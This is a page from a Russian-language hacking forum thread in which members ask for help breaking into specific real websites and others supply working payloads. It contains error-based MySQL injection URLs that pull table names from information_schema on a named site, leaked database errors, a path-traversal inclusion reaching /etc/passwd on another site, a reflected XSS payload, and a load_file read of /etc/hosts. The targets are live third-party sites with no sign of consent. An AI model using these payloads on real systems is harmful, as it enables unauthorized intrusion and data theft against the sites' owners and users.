HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 9 из 296 « Первая < 5 6 7 8 9 10 11 12 13 1959109 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 18.05.2015, 12:11
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию
select user() показывает что я dbauser@server.

в load_file('/etc/hosts') указывается строка: "209.200.x.x server server.site.com"

сам сайт находится на ип 209.200.x.x. реальный путь раскрыл, но файлы не читает.

Что в данном случае показывает запись в хостсе? не логично ли что я нахожусь на нужной машине и все должно читаться?
 
Ответить с цитированием

  #82  
Старый 18.05.2015, 14:57
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Цитата:
Сообщение от Unknowhacker  

На кавычку вроде реагирует, но не знаю, считается ли это SQL-Инъекцией
Код:
www.chromecrm.com/wyniki-wyszukiwania/?id=109&asId=as0'
по моему нету
 
Ответить с цитированием

  #83  
Старый 18.05.2015, 15:45
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию
Код:
http://www.coreknowledge.org/m'
Помогите раскрутить
 
Ответить с цитированием

  #84  
Старый 18.05.2015, 15:51
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Br@!ns  

Код:
http://www.coreknowledge.org/m'
Помогите раскрутить
GET /m'|(select*from(select+name_const(version(),1),nam e_const(version(),1))a)='1

однако name_const здесь не сработает, нужен другой вектор. сейчас посмотрю

UPD:

GET /m'||1%20group%20by%20concat((select%20table_name%2 0from%20information_schema.tables%20limit%200,1),f loor(rand(0)*2))having%20min(0)='1

SQL: select * from mimik_Menus where lookup_code = 'm'||1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))having min(0)='1'

MySQL_ERROR: Duplicate entry 'CHARACTER_SETS1' for key 1
 
Ответить с цитированием

  #85  
Старый 18.05.2015, 16:29
huntercs16
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами: 6630806

Репутация: 6
По умолчанию
http://astrodaily.ru/statya.php?s=astrologia_nauka.php

ребят, тут можно как то LFI раскрутить?
 
Ответить с цитированием

  #86  
Старый 18.05.2015, 16:33
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от huntercs16  

http://astrodaily.ru/statya.php?s=astrologia_nauka.php
ребят, тут можно как то LFI раскрутить?
Код:
http://astrodaily.ru/statya.php?s=lol/../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
 
Ответить с цитированием

  #87  
Старый 18.05.2015, 16:44
frank
Участник форума
Регистрация: 08.05.2015
Сообщений: 200
С нами: 5798486

Репутация: 28
По умолчанию
Цитата:
Сообщение от Br@!ns  

Код:
http://www.coreknowledge.org/m'
Помогите раскрутить
В догонку к тому что faza02 написал

Код HTML:
http://www.coreknowledge.org/mimik/mimik_live_data/view.php?id=194&sp_id=4&type=%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E&q=search
поиск.. id=194 строго, все что отличается от этого скул ошибка и

SQL: SELECT 1 FROM Fields WHERE type='Group Permission' AND table_id=

MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

параметh sp_id, если оставить пустым - ошибка

SQL: select name from mimik_Standalone_Pages where id =

MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Скорее всего тоже можно раскрутить по образу как faza02 написал... параметр type не фильтруется, что в примере выше и показал, ксс отраженная проходит на ура.
 
Ответить с цитированием

  #88  
Старый 18.05.2015, 17:27
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию
Цитата:
Сообщение от faza02  

GET /m'|(select*from(select+name_const(version(),1),nam e_const(version(),1))a)='1
однако name_const здесь не сработает, нужен другой вектор. сейчас посмотрю
Можно, но трудно:

http://www.coreknowledge.org/141241...es`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c )='1
 
Ответить с цитированием

  #89  
Старый 18.05.2015, 17:35
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Br@!ns  
я ж скинул вектор, что не так? там все нормально крутится и не сложно

Код:
http://www.coreknowledge.org/m%27||1%20group%20by%20concat%28%28select%20table_name%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29having%20min%280%29=%271
 
Ответить с цитированием

  #90  
Старый 18.05.2015, 22:31
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию
Тут можно что нибудь сделать?

Код:
http://www.woodworkersworkshop.com/resources/index.php?search=asfasfasf
 
Ответить с цитированием
Ответ
Страница 9 из 296 « Первая < 5 6 7 8 9 10 11 12 13 1959109 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.